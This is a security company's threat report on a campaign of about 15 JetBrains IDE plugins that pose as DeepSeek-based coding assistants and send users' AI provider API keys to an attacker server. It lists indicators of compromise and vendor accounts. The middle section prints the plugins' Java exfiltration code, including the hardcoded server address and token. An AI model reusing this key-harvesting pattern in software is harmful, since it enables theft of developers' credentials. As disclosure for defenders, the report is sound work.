We detected a coordinated malware campaign on the JetBrains Marketplace. At least 15 IDE plugins, published under seven vendor accounts, share the same hidden behavior. Each one exfiltrates the AI provider API key that you stored into its settings, and together they have been installed close to 70,000 times.
Every plugin poses as an AI coding assistant built on DeepSeek and other large language models, offering chat, commit messages, code review, bug finding, and unit tests. They function exactly as advertised. However, the AI provider API key you enter gets exfiltrated to a server controlled by the attacker.
The earliest versions appeared at the end of October 2025, and new ones are still being released in June 2026. The real impact is hard to measure, since download counts are easy to inflate by vendors and the marketplace listings also contain fake five star reviews.
The affected plugins are listed at the end of the article.
How the theft works
All fifteen plugins share a similar codebase that has been renamed and repackaged for each listing. To use any of them, you open the settings panel and paste in an API key for a provider such as OpenAI, SiliconFlow, or DeepSeek. The plugin needs that key to call the model on your behalf, so handing it over feels routine.
The moment you click Apply, the settings handler stores your key and also forwards it to the attacker using the save() method. The call fires immediately on key entry, with no prompt, no consent screen, and no mention anywhere in the user interface.
// runs inside the settings apply() handler, the instant you save your key
public static void save(String key) {
if (key != null && key.startsWith("sk-") && ks.add(key) && StringUtils.length(key) == 51) {
SoftwareDto dto = new SoftwareDto();
dto.setApiKey(key); // your provider secret
BaseUtil.request("key", dto); // shipped off to the attacker server
}
}
// the network call that leaves your machine
URL url = new URI("http://39.107.60[.]51/api/software/" + name).toURL();
connection.setRequestMethod("POST");
connection.setRequestProperty("X-Api-Key", "F48D2AA7CF341F782C1D");
byte[] input = new Gson().toJson(vo).getBytes(StandardCharsets.UTF_8); // vo holds your apiKeyThe destination is a hardcoded server at 39.107.60[.]51 reached over plain HTTP, authenticated with a static token hardcoded into the plugin. Your key is sent in plaintext to an address that has nothing to do with any legitimate AI provider.
The plugins also run a paid tier. After a user pays a small fee through the donation wall built into the plugin, the server sends an API key back down to the client, and the plugin starts using that key for its model calls instead of your own, which is bizarre, since no legitimate operator would simply hand a user a working and unrestricted key to a paid AI provider.
WebResult webResult = BaseUtil.request("check", vo);
if (webResult.isSuccess()) {
key = data.getApiKey(); // a key handed back by the attacker server
}
// the plugin always prefers the server supplied key
public static String getKey() {
return StringUtils.defaultIfBlank(BaseState.key, Value.getKey());
}A possible theory is that one group of victims pastes in their own keys, which the server harvests. A second group pays the operator and receives a working key in return. The keys handed to paying users may well be the keys stolen from everyone else, turning the campaign into a service that resells other people's stolen API access. The operator collects money on one side and free credentials on the other, while the genuine key owners pay the bill.
Why attackers keep aiming at IDEs
Editor plugin ecosystems have become a frequent target of supply chain attacks, with ongoing campaigns such as GlassWorm hitting VS Code. Developer machines are a high value target, and the IDE sits at the center of them. It holds source code, cloud credentials, signing keys, and now the API keys for paid AI services that can be resold or burned for compute. A plugin runs unsandboxed inside the IDE, inside a tool that people trust and leave open all day, which makes it an ideal hiding place for code that only misbehaves in the background.
JetBrains plugins do go through a manual review process before they reach the marketplace, yet a small piece of logic buried inside an otherwise working plugin can still slip through. Treat a plugin the same way you would treat any dependency that runs with your privileges, and be cautious about pasting long lived secrets into tools you have not vetted.
How Aikido detects this
If you are an Aikido user, check your central feed and filter on malware issues. This will surface as a 100/100 critical issue. Aikido rescans nightly, but we recommend triggering a manual rescan now.
If you are not yet an Aikido user, you can create an account and connect your repos. Our malware coverage is included in the free plan, no credit card required.
For broader coverage across your whole team, Aikido's Device Protection gives you visibility and control over the software packages installed on your team's devices. It covers browser extensions, code libraries, IDE plugins, and build dependencies, all in one place. Stop malware before it gets installed.
For future protection, consider Aikido Safe Chain (open source). Safe Chain sits in your existing workflow, intercepting npm, npx, yarn, pnpm, and pnpx commands and checking packages against Aikido Intel before install.
Indicators of Compromise
Network indicators
- C2 server IP:
39.107.60[.]51
Affected plugins (name and plugin id)
- DeepSeek Junit Test (
org.sm.yms.toolkit) – 1,121 downloads, released 2025-10-31 - DeepSeek Git Commit (
com.json.simple.kit) – 1,894 downloads, released 2025-11-01 - DeepSeek FindBugs (
org.bug.find.tools) – 1,485 downloads, released 2025-11-09 - DeepSeek AI Chat (
org.translate.ai.simple) – 1,317 downloads, released 2025-11-23 - DeepSeek Dev AI (
com.yy.test.ai.simple) – 740 downloads, released 2025-11-30 - DeepSeek AI Coding (
com.dev.ai.toolkit) – 450 downloads, released 2025-12-06 - AI FindBugs (
com.json.view.simple) – 623 downloads, released 2025-12-14 - AI Git Commitor (
com.my.git.ai.kit) – 301 downloads, released 2026-01-10 - AI Coder Review (
org.check.ai.ds) – 735 downloads, released 2026-01-11 - DeepSeek Coder AI (
com.review.tool.code) – 3,498 downloads, released 2026-01-15 - AI Coder Assistant (
org.code.assist.dev.tool) – 319 downloads, released 2026-02-01 - DeepSeek Code Review (
com.coder.ai.dpt) – 278 downloads, released 2026-04-18 - CodeGPT AI Assistant (
com.my.code.tools) – 25,571 downloads, released 2026-06-09 - DeepSeek AI Assist (
ord.cp.code.ai.kit) – 27,727 downloads, released 2026-06-10 - Coding Simple Tool (
com.dp.git.ai.tool) – 3,931 downloads, no online versions
Vendor accounts
- CodePilot (mycode)
- StackSmith (misshewei)
- CodeCrafter (keteme)
- CodeWeaver (simpledev)
- JetCode (skyblue)
- DailyCode (dialycode)
- ZenCoder (947cb4c8-5db1-4cf0-8182-0aae7c433bb3)
